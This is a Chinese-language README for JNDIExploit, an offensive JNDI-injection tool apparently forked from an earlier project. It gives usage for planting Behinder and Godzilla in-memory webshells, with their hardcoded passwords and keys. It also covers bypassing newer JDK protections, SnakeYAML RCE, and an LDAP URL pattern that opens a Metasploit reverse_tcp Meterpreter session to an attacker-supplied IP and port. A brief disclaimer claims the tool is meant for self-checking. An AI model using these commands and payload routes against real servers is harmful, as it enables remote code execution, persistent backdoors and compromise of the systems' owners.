JNDIExploit
一款用于 JNDI注入
利用的工具,大量參考/引用了 Rogue JNDI
項目的代碼,支持直接植入內(nèi)存shell
,并集成了常見的bypass 高版本JDK
的方式,適用于與自動化工具配合使用。
對 @feihong-cs 大佬的項目https://github.com/feihong-cs/JNDIExploit 進(jìn)行了一些改進(jìn),tomcatBypass現(xiàn)可直接上線msf。見添加內(nèi)容2
免責(zé)聲明
該工具僅用于安全自查檢測
由于傳播、利用此工具所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負(fù)責(zé),作者不為此承擔(dān)任何責(zé)任。
本人擁有對此工具的修改和解釋權(quán)。未經(jīng)網(wǎng)絡(luò)安全部門及相關(guān)部門允許,不得善自使用本工具進(jìn)行任何攻擊活動,不得以任何方式將其用于商業(yè)目的。
添加內(nèi)容
添加內(nèi)容是為了支持SpringBootExploit工具,是定制版的服務(wù)端。
- 啟動方式:java -jar JNDIExploit-1.3-SNAPSHOT.jar 默認(rèn)綁定127.0.0.1 LDAP 綁定 1389 HTTP Server 綁定3456
- 根目錄下BehinderFilter.class是內(nèi)存馬 /ateam 密碼是ateamnb
- data/behinder3.jar 是為了支持SnakYaml RCE
- 添加HTTPServer處理更多的請求,為了更好支持SpringBootExploit工具
- 將文件放在data目錄下,通過HTTPServer可以訪問文件內(nèi)容如同python的HTTPServer
添加內(nèi)容2
新增哥斯拉內(nèi)存馬
- 支持引用類遠(yuǎn)程加載方式打入(Basic路由)
- 支持本地工廠類方式打入 (TomcatBypass路由)
哥斯拉客戶端配置:
密碼:pass1024
密鑰:key
有效載荷:JavaDynamicPayload
加密器:JAVA_AES_BASE64
修復(fù)之前版本中的一些問題,冰蝎內(nèi)存馬現(xiàn)已直接可用冰蝎客戶端直連
新增msf上線支持
- 支持tomcatBypass路由直接上線msf:
使用msf的java/meterpreter/reverse_tcp開啟監(jiān)聽ldap://127.0.0.1:1389/TomcatBypass/Meterpreter/[msfip]/[msfport]
TODO
- 本地ClassPath反序列化漏洞利用方式
- 支持自定義內(nèi)存馬密碼
- 內(nèi)存馬模塊改一下
使用說明
使用 java -jar JNDIExploit.jar -h
查看參數(shù)說明,其中 --ip
參數(shù)為必選參數(shù)